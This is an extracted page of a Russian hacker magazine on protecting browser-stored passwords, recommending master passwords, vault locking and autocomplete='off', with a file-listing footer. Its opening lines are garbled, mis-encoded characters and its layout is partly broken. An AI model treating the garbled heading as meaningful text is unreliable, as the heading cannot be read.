ŦŖŝŦŖŗŤŨŭŞŠŞŧŖşŨŤŘŨŖŠŜśŢŤřũŨ ťŤŢŤŭŲŧŤūŦŖţŞŨŲŘŗśŝŤťŖŧţŤŧŨŞ šŤřŞţűŞťŖŦŤšŞťŤšŲŝŤŘŖŨśšŵ, ťŦŤŧŨŤťŦŞţũŚŞŨśšŲţŤŤŨŠšŴŭŞŘ ŚšŵŤŨŚśšŲţűūťŤšśşŞšŞŚŖŜśŬśšűū ŪŤŦŢŢśūŖţŞŝŢŖŘŨŤŝŖťŤšţśţŞŵ

Файл, хранящий пароли пользователя брау-

зера Google Chrome

МЕТОДЫЗАЩИТЫ

Как ты, возможно, уже знаешь, пользователь с правами администратора может восстановить хранящиеся в браузере данные авторизации любого пользователя системы. Кроме того, пользовательские пароли могут быть похищены вредоносными программами, проникнувшими в систему.

Ни хром, ни опера не имеют дополнительных средств защиты, поэтому пользователям этих браузеров лучше вовсе отказаться от возможности автозаполнения паролей и воспользоваться сторонними менеджерами паролей (чтобы выбрать подходящий, настоятельно рекомендую тебе изучить статью «Проверка на прочность» из номера 179 журнала). Firefox же предлагает более высокий уровень безопасности, предоставляя возможность задать менеджеру паролей мастер-пароль. Для этого в настройках браузера на вкладке «Защита» надо всего лишь установить флажок «Использовать мастер-па- роль». Этот пароль должен быть надежным. Шкала уровня качества пароля укажет на его стойкость к взлому.

В Windows Vault присутствует возможность блокировки хранилища с помощью пароля. Также можно настроить хра-

WWWнилище запрашивать у пользователя разрешение при попытке приложения получить доступ к паролю элемента.

Интересная статья	Ну и наконец, разработчики сайтов. Они также могут по-
про DPAPI:	мочь сохранить в безопасности логины и пароли пользова-
goo.gl/AInQJw	теля, просто принудительно отключив для отдельных полей
Куча материалов по вос-	или даже целых форм механизм автозаполнения с помощью
Куча материалов по вос-	установки атрибута autocomplete="off". Соответствен-
становлению забытых	но, для конкретного поля это будет выглядеть так: <input
паролей:	name="login" autocomplete="off" />, а для формы: <form
goo.gl/dvOjoW	autocomplete="off">.

	ЗАКЛЮЧЕНИЕ
	Как видишь, польза от функций сохранения паролей и авто-
Таблица logins	заполнения форм довольно сомнительна. На мой взгляд, они
	могут принести пользователю больше вреда в случае угона
	его логинов/паролей и прочих важных данных. Поэтому я бы
	предпочел, чтобы браузеры не брали на себя заботу по запо-
	минанию моих паролей. Но увы, такая фича присутствует прак-
	тически везде. Да, как ты можешь справедливо заметить, ее
	можно отключить. Но никто не даст гарантии, что «друг» или
	«коллега», севший за твой компьютер, не включит ее, после
	чего все твои credentials будут сохраняться абсолютно неза-
	метно для тебя (а «друг» через некоторое время получит твои
	сохраненные credentials и вернет все на свои места). Так что,
	видимо, выход один — просто быть всегда начеку.

<<< < Предыдущая 1 2 3 4 5 6 78 / 158 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202423.5 Mб12181_Optimized.pdf
#
20.04.202426.52 Mб12182_Optimized.pdf
#
20.04.202428.5 Mб12183_Optimized.pdf
#
20.04.202422.1 Mб12184_Optimized.pdf
#
20.04.202423.69 Mб12185_Optimized.pdf
#
20.04.202425.1 Mб12186_Optimized.pdf
#
19.04.202429.32 Mб13187_Optimized.pdf
#
20.04.202419.96 Mб12188_Optimized.pdf
#
20.04.202432.08 Mб12189_Optimized.pdf
#
20.04.202430.24 Mб12190_Optimized.pdf
#
20.04.202427.6 Mб12191_Optimized.pdf